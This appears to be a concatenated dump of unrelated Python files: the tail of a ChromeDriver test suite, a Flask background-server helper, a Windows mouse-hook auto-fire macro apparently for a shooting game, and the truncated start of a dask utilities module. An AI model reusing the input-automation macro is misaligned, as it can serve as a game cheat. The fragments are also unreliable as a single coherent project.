precedence over Airplane Mode. connection_type = 0x3 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testNetworkConnectionTypeIsAppliedToAllTabsImmediately(self): def respondWithString(request): return {}, """ <html> <body>%s</body> </html>""" % "hello world!" self._http_server.SetCallbackForPath( '/helloworld', respondWithString) driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Set network to online connection_type = 0x10 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) # Open a window with two divs counting successful + unsuccessful # attempts to complete XML task driver.Load( self._http_server.GetUrl() +'/chromedriver/xmlrequest_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() driver.FindElement('css selector', '#requestButton').Click() driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) # Set network to offline to determine whether the XML task continues to # run in the background, indicating that the conditions are only applied # to the current WebView connection_type = 0x1 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) connection_type = 0x1 def testNetworkConnectionTypeIsAppliedToAllTabs(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) driver.Load(self._http_server.GetUrl() +'/chromedriver/page_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() # Test connection is offline. connection_type = 0x1; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) # Navigate to another window. driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) self.assertRaises( chromedriver.NoSuchElement, driver.FindElement, 'css selector', '#link') # Set connection to 3G in second window. connection_type = 0x10; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) self.assertEquals(window1_handle, driver.GetCurrentWindowHandle()) # Test whether first window has old or new network conditions. network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testDefaultComplianceMode(self): driver = self.CreateDriver(send_w3c_capability=None, send_w3c_request=True) self.assertTrue(driver.w3c_compliant) def testW3cCompliantResponses(self): # It's an error to send Legacy format request # without Legacy capability flag. with self.assertRaises(chromedriver.InvalidArgument): self.CreateDriver(send_w3c_request=False) # It's an error to send Legacy format capability # without Legacy request flag. with self.assertRaises(chromedriver.SessionNotCreated): self.CreateDriver(send_w3c_capability=False) # Can enable W3C capability in a W3C format request. driver = self.CreateDriver(send_w3c_capability=True) self.assertTrue(driver.w3c_compliant) # Can enable W3C request in a legacy format request. driver = self.CreateDriver(send_w3c_request=True) self.assertTrue(driver.w3c_compliant) # Asserts that errors are being raised correctly in the test client # with a W3C compliant driver. self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) # Can set Legacy capability flag in a Legacy format request. driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) self.assertFalse(driver.w3c_compliant) class ChromeDriverLogTest(ChromeDriverBaseTest): """Tests that chromedriver produces the expected log file.""" UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability' LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP def testChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path) try: driver = chromedriver.ChromeDriver( chromedriver_server.GetUrl(), chromedriver_server.GetPid(), chrome_binary=_CHROME_BINARY, experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 }) driver.Quit() except chromedriver.ChromeDriverException as e: self.assertTrue(self.LOG_MESSAGE in e.message) finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertTrue(self.LOG_MESSAGE in f.read()) def testDisablingDriverLogsSuppressesChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path, verbose=False) try: driver = self.CreateDriver( chromedriver_server.GetUrl(), logging_prefs={'driver':'OFF'}) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') driver.AddCookie({'name': 'secret_code', 'value': 'bosco'}) driver.Quit() finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertNotIn('bosco', f.read()) class ChromeLoggingCapabilityTest(ChromeDriverBaseTest): """Tests chromedriver tracing support and Inspector event collection.""" def testPerformanceLogger(self): driver = self.CreateDriver( experimental_options={'perfLoggingPrefs': { 'traceCategories': 'blink.console' }}, logging_prefs={'performance':'ALL'}) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') # Mark the timeline; later we will verify the marks appear in the trace. driver.ExecuteScript('console.time("foobar")') driver.ExecuteScript('console.timeEnd("foobar")') logs = driver.GetLog('performance') driver.Quit() marked_timeline_events = [] seen_log_domains = {} for entry in logs: devtools_message = json.loads(entry['message'])['message'] method = devtools_message['method'] domain = method[:method.find('.')] seen_log_domains[domain] = True if method != 'Tracing.dataCollected': continue self.assertTrue('params' in devtools_message) self.assertTrue(isinstance(devtools_message['params'], dict)) cat = devtools_message['params'].get('cat', '') if (cat == 'blink.console' and devtools_message['params']['name'] == 'foobar'): marked_timeline_events.append(devtools_message) self.assertEquals(2, len(marked_timeline_events)) self.assertEquals({'Network', 'Page', 'Tracing'}, set(seen_log_domains.keys())) def testDevToolsEventsLogger(self): """Tests that the correct event type (and no other) is logged""" event = 'Page.loadEventFired' driver = self.CreateDriver( devtools_events_to_log=[event], logging_prefs={'devtools':'ALL'}) driver.Load('about:blank') logs = driver.GetLog('devtools') for entry in logs: devtools_message = json.loads(entry['message']) method = devtools_message['method'] self.assertTrue('params' in devtools_message) self.assertEquals(event, method) class SessionHandlingTest(ChromeDriverBaseTest): """Tests for session operations.""" def testQuitASessionMoreThanOnce(self): driver = self.CreateDriver() driver.Quit() driver.Quit() def testGetSessions(self): driver = self.CreateDriver() response = driver.GetSessions() self.assertEqual(1, len(response)) driver2 = self.CreateDriver() response = driver2.GetSessions() self.assertEqual(2, len(response)) class RemoteBrowserTest(ChromeDriverBaseTest): """Tests for ChromeDriver remote browser capability.""" def setUp(self): self.assertTrue(_CHROME_BINARY is not None, 'must supply a chrome binary arg') def testConnectToRemoteBrowser(self): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = next(ports_generator) temp_dir = util.MakeTempDir() print('temp dir is ' + temp_dir) cmd = [_CHROME_BINARY, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver(debugger_address='localhost:%d' % port) driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print('continuing to wait for Chrome to exit') time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. def testConnectToRemoteBrowserLiteralAddressHeadless(self): debug_addrs = ['127.0.0.1', '::1'] debug_url_addrs = ['127.0.0.1', '[::1]'] for (debug_addr, debug_url_addr) in zip(debug_addrs, debug_url_addrs): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = next(ports_generator) temp_dir = util.MakeTempDir() print('temp dir is ' + temp_dir) cmd = [_CHROME_BINARY, '--headless', '--remote-debugging-address=%s' % debug_addr, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver( debugger_address='%s:%d' % (debug_url_addr, port)) driver.ExecuteScript( 'console.info("%s")' % 'connecting at %d!' % port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print('continuing to wait for Chrome to exit') time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class LaunchDesktopTest(ChromeDriverBaseTest): """Tests that launching desktop Chrome works.""" def testExistingDevToolsPortFile(self): """If a DevTools port file already exists before startup, then we should ignore it and get our debug port number from the new file.""" user_data_dir = tempfile.mkdtemp() try: dev_tools_port_file = os.path.join(user_data_dir, 'DevToolsActivePort') with open(dev_tools_port_file, 'w') as fd: fd.write('34\n/devtools/browser/2dab5fb1-5571-40d8-a6ad-98823bc5ff84') driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir]) with open(dev_tools_port_file, 'r') as fd: port = int(fd.readlines()[0]) # Ephemeral ports are always high numbers. self.assertTrue(port > 100) finally: shutil.rmtree(user_data_dir, ignore_errors=True) def testHelpfulErrorMessage_NormalExit(self): """If Chrome fails to start, we should provide a useful error message.""" if util.IsWindows(): # Not bothering implementing a Windows test since then I would have # to implement Windows-specific code for a program that quits and ignores # any arguments. Linux and Mac should be good enough coverage. return file_descriptor, path = tempfile.mkstemp() try: os.write(file_descriptor, '#!/bin/bash\nexit 0') os.close(file_descriptor) os.chmod(path, 0o777) exception_raised = False try: driver = chromedriver.ChromeDriver(_CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=path, test_name=self.id()) except Exception as e: self.assertIn('Chrome failed to start', e.message) self.assertIn('exited normally', e.message) self.assertIn('ChromeDriver is assuming that Chrome has crashed', e.message) exception_raised = True self.assertTrue(exception_raised) try: driver.Quit() except: pass finally: pass os.remove(path) def testNoBinaryErrorMessage(self): temp_dir = tempfile.mkdtemp() exception_raised = False try: driver = chromedriver.ChromeDriver( _CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=os.path.join(temp_dir, 'this_file_should_not_exist'), test_name=self.id()) except Exception as e: self.assertIn('no chrome binary', e.message) exception_raised = True finally: shutil.rmtree(temp_dir) self.assertTrue(exception_raised) class PerfTest(ChromeDriverBaseTest): """Tests for ChromeDriver perf.""" def _RunDriverPerfTest(self, name, test_func): """Runs a perf test ChromeDriver server. Args: name: The name of the perf test. test_func: Called with the server url to perform the test action. Must return the time elapsed. """ result = [] for iteration in range(10): result += [test_func(_CHROMEDRIVER_SERVER_URL)] def PrintResult(result): mean = sum(result) / len(result) avg_dev = sum([abs(sample - mean) for sample in result]) / len(result) print('perf result', name, mean, avg_dev, result) util.AddBuildStepText('%s: %.3f+-%.3f' % ( name, mean, avg_dev)) # Discard first result, which may be off due to cold start. PrintResult(result[1:]) def testSessionStartTime(self): def Run(url): start = monotonic() driver = self.CreateDriver(url) end = monotonic() driver.Quit() return end - start self._RunDriverPerfTest('session start', Run) def testSessionStopTime(self): def Run(url): driver = self.CreateDriver(url) start = monotonic() driver.Quit() end = monotonic() return end - start self._RunDriverPerfTest('session stop', Run) def testColdExecuteScript(self): def Run(url): driver = self.CreateDriver(url) start = monotonic() driver.ExecuteScript('return 1') end = monotonic() driver.Quit() return end - start self._RunDriverPerfTest('cold exe js', Run) class HeadlessInvalidCertificateTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" @staticmethod def GetHttpsUrlForFile(file_path): return ( HeadlessInvalidCertificateTest._https_server.GetUrl() + file_path) def setUp(self): self._driver = self.CreateDriver(chrome_switches = ["--headless"], accept_insecure_certs = True) def testLoadsPage(self): print("loading") self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html')) # Verify that page content loaded. self._driver.FindElement('css selector', '#link') def testNavigateNewWindow(self): print("loading") self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html')) self._driver.ExecuteScript( 'document.getElementById("link").href = "page_test.html";') old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) # Verify that page content loaded in new window. self._driver.FindElement('css selector', '#link') class HeadlessChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver(chrome_switches=['--headless']) def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testWindowFullScreen(self): old_rect_list = self._driver.GetWindowRect() # Testing the resulting screensize doesn't work in headless, because there # is no screen to give a size. # We just want to ensure this command doesn't timeout or error. self._driver.FullScreenWindow() # Restore a known size so next tests won't fail self._driver.SetWindowRect(*old_rect_list) def testPrintHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) pdf = self._driver.PrintPDF({ 'orientation': 'landscape', 'scale': 1.1, 'margin': { 'top': 1.1, 'bottom': 2.2, 'left': 3.3, 'right': 4.4 }, 'background': True, 'shrinkToFit': False, 'pageRanges': [1], 'page': { 'width': 15.6, 'height': 20.6 } }) decoded_pdf = base64.b64decode(pdf) self.assertTrue(decoded_pdf.startswith("%PDF")) self.assertTrue(decoded_pdf.endswith("%%EOF")) def testPrintInvalidArgumentHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self.assertRaises(chromedriver.InvalidArgument, self._driver.PrintPDF, {'pageRanges': ['x-y']}) class SupportIPv4AndIPv6(ChromeDriverBaseTest): def testSupportIPv4AndIPv6(self): has_ipv4 = False has_ipv6 = False for info in socket.getaddrinfo('localhost', 0): if info[0] == socket.AF_INET: has_ipv4 = True if info[0] == socket.AF_INET6: has_ipv6 = True if has_ipv4: self.CreateDriver("http://127.0.0.1:" + str(chromedriver_server.GetPort())) if has_ipv6: self.CreateDriver('http://[::1]:' + str(chromedriver_server.GetPort())) class JavaScriptTests(ChromeDriverBaseTestWithWebServer): def GetFileUrl(self, filename): return 'file://' + self.js_root + filename def setUp(self): self._driver = self.CreateDriver() self.js_root = os.path.dirname(os.path.realpath(__file__)) + '/../js/' self._driver.SetWindowRect(640, 480, 0, 0) def checkTestResult(self): def getStatus(): return self._driver.ExecuteScript('return window.CDCJStestRunStatus') self.WaitForCondition(getStatus) self.assertEquals('PASS', getStatus()) def testAllJS(self): self._driver.Load(self.GetFileUrl('call_function_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('dispatch_touch_event_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_async_script_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_script_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_location_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_region_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('is_option_element_toggleable_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('focus_test.html')) self.checkTestResult() # 'Z' in the beginning is to make test executed in the end of suite. class ZChromeStartRetryCountTest(unittest.TestCase): def testChromeStartRetryCount(self): self.assertEquals(0, chromedriver.ChromeDriver.retry_count, "Chrome was retried to start during suite execution " "in following tests:\n" + ', \n'.join(chromedriver.ChromeDriver.retried_tests)) if __name__ == '__main__': parser = optparse.OptionParser() parser.add_option( '', '--chromedriver', help='Path to chromedriver server (REQUIRED!)') parser.add_option( '', '--log-path', help='Output verbose server logs to this file') parser.add_option( '', '--replayable', help="Don't truncate long strings in the log so that the log can be " "replayed.") parser.add_option( '', '--chrome', help='Path to a build of the chrome binary') parser.add_option( '', '--filter', type='string', default='', help='Filter for specifying what tests to run, \"*\" will run all,' 'including tests excluded by default. E.g., *testRunMethod') parser.add_option( '', '--android-package', help=('Android package key. Possible values: ' + str(list(_ANDROID_NEGATIVE_FILTER.keys())))) parser.add_option( '', '--isolated-script-test-output', help='JSON output file used by swarming') parser.add_option( '', '--test-type', help='Select type of tests to run. Possible value: integration') options, args = parser.parse_args() if options.chromedriver is None: parser.error('--chromedriver is required.\n' + 'Please run "%s --help" for help' % __file__) options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver) if (not os.path.exists(options.chromedriver) and util.GetPlatformName() == 'win' and not options.chromedriver.lower().endswith('.exe')): options.chromedriver = options.chromedriver + '.exe' if not os.path.exists(options.chromedriver): parser.error('Path given by --chromedriver is invalid.\n' + 'Please run "%s --help" for help' % __file__) if options.replayable and not options.log_path: parser.error('Need path specified when replayable log set to true.') # When running in commit queue & waterfall, minidump will need to write to # same directory as log, so use the same path global _MINIDUMP_PATH if options.log_path: _MINIDUMP_PATH = os.path.dirname(options.log_path) global _CHROMEDRIVER_BINARY _CHROMEDRIVER_BINARY = util.GetAbsolutePathOfUserPath(options.chromedriver) if (options.android_package and options.android_package not in _ANDROID_NEGATIVE_FILTER): parser.error('Invalid --android-package') global chromedriver_server chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path, replayable=options.replayable) global _CHROMEDRIVER_SERVER_PID _CHROMEDRIVER_SERVER_PID = chromedriver_server.GetPid() global _CHROMEDRIVER_SERVER_URL _CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl() global _CHROME_BINARY if options.chrome: _CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome) else: # In some test environments (such as commit queue), it's not convenient to # specify Chrome binary location on the command line. Try to use heuristics # to locate the Chrome binary next to the ChromeDriver binary. driver_path = os.path.dirname(_CHROMEDRIVER_BINARY) chrome_path = None platform = util.GetPlatformName() if platform == 'linux': chrome_path = os.path.join(driver_path, 'chrome') elif platform == 'mac': if os.path.exists(os.path.join(driver_path, 'Google Chrome.app')): chrome_path = os.path.join(driver_path, 'Google Chrome.app', 'Contents', 'MacOS', 'Google Chrome') else: chrome_path = os.path.join(driver_path, 'Chromium.app', 'Contents', 'MacOS', 'Chromium') elif platform == 'win': chrome_path = os.path.join(driver_path, 'chrome.exe') if chrome_path is not None and os.path.exists(chrome_path): _CHROME_BINARY = chrome_path else: _CHROME_BINARY = None global _ANDROID_PACKAGE_KEY _ANDROID_PACKAGE_KEY = options.android_package if _ANDROID_PACKAGE_KEY: devil_chromium.Initialize() if options.filter == '': if _ANDROID_PACKAGE_KEY: negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY] else: negative_filter = _GetDesktopNegativeFilter() if options.test_type is not None: if options.test_type == 'integration': negative_filter += _INTEGRATION_NEGATIVE_FILTER else: parser.error('Invalid --test-type. Valid value: integration') options.filter = '*-' + ':__main__.'.join([''] + negative_filter) all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule( sys.modules[__name__]) test_suite = unittest_util.FilterTestSuite(all_tests_suite, options.filter) test_suites = [test_suite] ChromeDriverBaseTestWithWebServer.GlobalSetUp() runner = unittest.TextTestRunner( stream=sys.stdout, descriptions=False, verbosity=2, resultclass=unittest_util.AddSuccessTextTestResult) result = runner.run(test_suite) results = [result] num_failed = len(result.failures) + len(result.errors) # Limit fail tests to 10 to avoid real bug causing many tests to fail # Only enable retry for automated bot test if (num_failed > 0 and num_failed <= 10 and options.test_type == 'integration'): retry_test_suite = unittest.TestSuite() for f in result.failures: retry_test_suite.addTest(f[0]) for e in result.errors: retry_test_suite.addTest(e[0]) test_suites.append(retry_test_suite) print('\nRetrying failed tests\n') retry_result = runner.run(retry_test_suite) results.append(retry_result) ChromeDriverBaseTestWithWebServer.GlobalTearDown() if options.isolated_script_test_output: util.WriteResultToJSONFile(test_suites, results, options.isolated_script_test_output) util.TryUploadingResultToResultSink(results) sys.exit(len(results[-1].failures) + len(results[-1].errors))
__init__.py
from __future__ import absolute_import, print_function import multiprocessing import time from flask import Flask __all__ = ('create_app', 'BackgroundServerWrapper') def create_app(name='butts', debug=False): app = Flask(name) app.debug = debug app.add_url_rule('/', 'index', lambda: "INDEX") app.add_url_rule('/yow', 'yow', lambda: "YOW") return app class BackgroundServerWrapper(object): """Wraps a flask application and allows it to be run in the background.""" def __init__(self, app, port=5000): self.app = app self.port = port self._process = multiprocessing.Process( target=lambda app, port: app.run(port=port), args=(self.app, self.port) ) def start_server(self): self._process.start() time.sleep(1) def stop_server(self): if self._process: self._process.terminate()
keyboardListener.py
# -*- coding: utf-8 -*- import pythoncom import pyHook import win32api import win32con import time import threading import random VK_CODE = { 'backspace': 0x08, 'tab': 0x09, 'clear': 0x0C, 'enter': 0x0D, 'shift': 0x10, 'ctrl': 0x11, 'alt': 0x12, 'pause': 0x13, 'caps_lock': 0x14, 'esc': 0x1B, 'spacebar': 0x20, 'page_up': 0x21, 'page_down': 0x22, 'end': 0x23, 'home': 0x24, 'left_arrow': 0x25, 'up_arrow': 0x26, 'right_arrow': 0x27, 'down_arrow': 0x28, 'select': 0x29, 'print': 0x2A, 'execute': 0x2B, 'print_screen': 0x2C, 'ins': 0x2D, 'del': 0x2E, 'help': 0x2F, '0': 0x30, '1': 0x31, '2': 0x32, '3': 0x33, '4': 0x34, '5': 0x35, '6': 0x36, '7': 0x37, '8': 0x38, '9': 0x39, 'a': 0x41, 'b': 0x42, 'c': 0x43, 'd': 0x44, 'e': 0x45, 'f': 0x46, 'g': 0x47, 'h': 0x48, 'i': 0x49, 'j': 0x4A, 'k': 0x4B, 'l': 0x4C, 'm': 0x4D, 'n': 0x4E, 'o': 0x4F, 'p': 0x50, 'q': 0x51, 'r': 0x52, 's': 0x53, 't': 0x54, 'u': 0x55, 'v': 0x56, 'w': 0x57, 'x': 0x58, 'y': 0x59, 'z': 0x5A, 'numpad_0': 0x60, 'numpad_1': 0x61, 'numpad_2': 0x62, 'numpad_3': 0x63, 'numpad_4': 0x64, 'numpad_5': 0x65, 'numpad_6': 0x66, 'numpad_7': 0x67, 'numpad_8': 0x68, 'numpad_9': 0x69, 'multiply_key': 0x6A, 'add_key': 0x6B, 'separator_key': 0x6C, 'subtract_key': 0x6D, 'decimal_key': 0x6E, 'divide_key': 0x6F, 'F1': 0x70, 'F2': 0x71, 'F3': 0x72, 'F4': 0x73, 'F5': 0x74, 'F6': 0x75, 'F7': 0x76, 'F8': 0x77, 'F9': 0x78, 'F10': 0x79, 'F11': 0x7A, 'F12': 0x7B, 'F13': 0x7C, 'F14': 0x7D, 'F15': 0x7E, 'F16': 0x7F, 'F17': 0x80, 'F18': 0x81, 'F19': 0x82, 'F20': 0x83, 'F21': 0x84, 'F22': 0x85, 'F23': 0x86, 'F24': 0x87, 'num_lock': 0x90, 'scroll_lock': 0x91, 'left_shift': 0xA0, 'right_shift ': 0xA1, 'left_control': 0xA2, 'right_control': 0xA3, 'left_menu': 0xA4, 'right_menu': 0xA5, 'browser_back': 0xA6, 'browser_forward': 0xA7, 'browser_refresh': 0xA8, 'browser_stop': 0xA9, 'browser_search': 0xAA, 'browser_favorites': 0xAB, 'browser_start_and_home': 0xAC, 'volume_mute': 0xAD, 'volume_Down': 0xAE, 'volume_up': 0xAF, 'next_track': 0xB0, 'previous_track': 0xB1, 'stop_media': 0xB2, 'play/pause_media': 0xB3, 'start_mail': 0xB4, 'select_media': 0xB5, 'start_application_1': 0xB6, 'start_application_2': 0xB7, 'attn_key': 0xF6, 'crsel_key': 0xF7, 'exsel_key': 0xF8, 'play_key': 0xFA, 'zoom_key': 0xFB, 'clear_key': 0xFE, '+': 0xBB, ',': 0xBC, '-': 0xBD, '.': 0xBE, '/': 0xBF, '`': 0xC0, ';': 0xBA, '[': 0xDB, '\\': 0xDC, ']': 0xDD, "'": 0xDE, '`': 0xC0} def key_press(key=''): if key != '' and isinstance(key, str): if key.__len__() == 1: win32api.keybd_event(VK_CODE[key], 0, 0, 0) print('press key down:%s' % VK_CODE[key]) else: for x in key: win32api.keybd_event(VK_CODE[x], 0, 0, 0) def key_up(key=''): if key != '' and isinstance(key, str): if key.__len__() == 1: win32api.keybd_event(VK_CODE[key], 0, win32con.KEYEVENTF_KEYUP, 0) print('press key up:%s' % VK_CODE[key]) else: for x in key: win32api.keybd_event(VK_CODE[x], 0, win32con.KEYEVENTF_KEYUP, 0) def send_click(): global down_num, up_num while (1): if down_num != up_num: win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0) # 连射多少秒,大约0.1秒一发子弹 time.sleep(random.uniform(0.38, 0.42)) win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0) # 连发之间的停顿时间 time.sleep(random.uniform(0.25, 0.29)) key_press('2') key_up('2') time.sleep(random.uniform(0.38, 0.56)) key_press('1') key_up('1') print('click ok') def onMouse_leftdown(event): # 监听鼠标左键按下事件 global down_num down_num += 1 print("left DOWN DOWN" + str(down_num)) return True # 返回 True 表示响应此事件,False表示拦截 def onMouse_leftup(event): # 监听鼠标左键弹起事件 global up_num up_num += 1 print("left UP UP UP" + str(up_num)) return True def keybord_1(event): pass def main(): hm = pyHook.HookManager() hm.MouseLeftDown = onMouse_leftdown hm.MouseLeftUp = onMouse_leftup hm.HookMouse() # 进入循环,如不手动关闭,程序将一直处于监听状态 pythoncom.PumpMessages() if __name__ == "__main__": down_num = 0 up_num = 0 # 新线程执行的代码: print('thread %s is running...' % threading.current_thread().name) t = threading.Thread(target=send_click, name='sendThread') t.start() # t.join() main()
utils.py
import asyncio from asyncio import TimeoutError import atexit import click from collections import deque, OrderedDict, UserDict from concurrent.futures import ThreadPoolExecutor, CancelledError # noqa: F401 from contextlib import contextmanager, suppress import functools from hashlib import md5 import html import json import logging import multiprocessing import os import re import shutil import socket from time import sleep import importlib from importlib.util import cache_from_source import inspect import sys import tempfile import threading import warnings import weakref import pkgutil import base64 import tblib.pickling_support import xml.etree.ElementTree try: import resource except ImportError: resource = None import dask from dask import istask # provide format_bytes here for backwards compatibility from dask.utils import ( # noqa format_bytes, funcname, format_time, parse_bytes, parse_timedelta, ) import tlz as toolz from tornado import gen from tornado.ioloop import IOLoop try: from tornado.ioloop import PollIOLoop except ImportError: PollIOLoop = None # dropped in tornado 6.0 from .compatibility import PYPY, WINDOWS, get_running_loop from .metrics import time try: from dask.context import thread_state except ImportError: thread_state = threading.local() logger = _logger = logging.getLogger(__name__) no_default = "__no_default__" def _initialize_mp_context(): if WINDOWS or PYPY: return multiprocessing else: method = dask.config.get("distributed.worker.multiprocessing-method") ctx = multiprocessing.get_context(method) # Makes the test suite much faster preload = ["distributed"] if "pkg_resources" in sys.modules: preload.append("pkg_resources") from .versions import required_packages, optional_packages for pkg, _ in required_packages + optional_packages: try: importlib.import_module(pkg) except ImportError: pass else: preload.append(pkg) ctx.set_forkserver_preload(preload) return ctx mp_context = _initialize_mp_context() def has_arg(func, argname): """ Whether the function takes an argument with the given name. """ while True: try: if argname in inspect.getfullargspec(func).args: return True except TypeError: break try: # For Tornado coroutines and other decorated functions func = func.__wrapped__ except AttributeError: break return False def get_fileno_limit(): """ Get the maximum number of open files per process. """ if resource is not None: return resource.getrlimit(resource.RLIMIT_NOFILE)[0] else: # Default ceiling for Windows when using the CRT, though it # is settable using _setmaxstdio(). return 512 @toolz.memoize def _get_ip(host, port, family): # By using a UDP socket, we don't actually try to connect but # simply select the local address through which *host* is reachable. sock = socket.socket(family, socket.SOCK_DGRAM) try: sock.connect((host, port)) ip = sock.getsockname()[0] return ip except EnvironmentError as e: warnings.warn( "Couldn't detect a suitable IP address for " "reaching %r, defaulting to hostname: %s" % (host, e), RuntimeWarning, ) addr_info = socket.getaddrinfo( socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP )[0] return addr_info[4][0] finally: sock.close() def get_ip(host="8.8.8.8", port=80): """ Get the local IP address through which the *host* is reachable. *host* defaults to a well-known Internet host (one of Google's public DNS servers). """ return _get_ip(host, port, family=socket.AF_INET) def get_ipv6(host="2001:4860:4860::8888", port=80): """ The same as get_ip(), but for IPv6. """ return _get_ip(host, port, family=socket.AF_INET6) def get_ip_interface(ifname): """ Get the local IPv4 address of a network interface. KeyError is raised if the interface doesn't exist. ValueError is raised if the interface does no have an IPv4 address associated with it. """ import psutil net_if_addrs = psutil.net_if_addrs() if ifname not in net_if_addrs: allowed_ifnames = list(net_if_addrs.keys()) raise ValueError( "{!r} is not a valid network interface. " "Valid network interfaces are: {}".format(ifname, allowed_ifnames) ) for info in net_if_addrs[ifname]: if info.family == socket.AF_INET: return info.address raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,)) # FIXME: this breaks if changed to async def... @gen.coroutine def ignore_exceptions(coroutines, *exceptions): """ Process list of coroutines, ignoring certain exceptions >>> coroutines = [cor(...) for ...] # doctest: +SKIP >>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP """ wait_iterator = gen.WaitIterator(*coroutines) results = [] while not wait_iterator.done(): with suppress(*exceptions): result = yield wait_iterator.next() results.append(result) raise gen.Return(results) async def All(args, quiet_exceptions=()): """ Wait on many tasks at the same time Err once any of the tasks 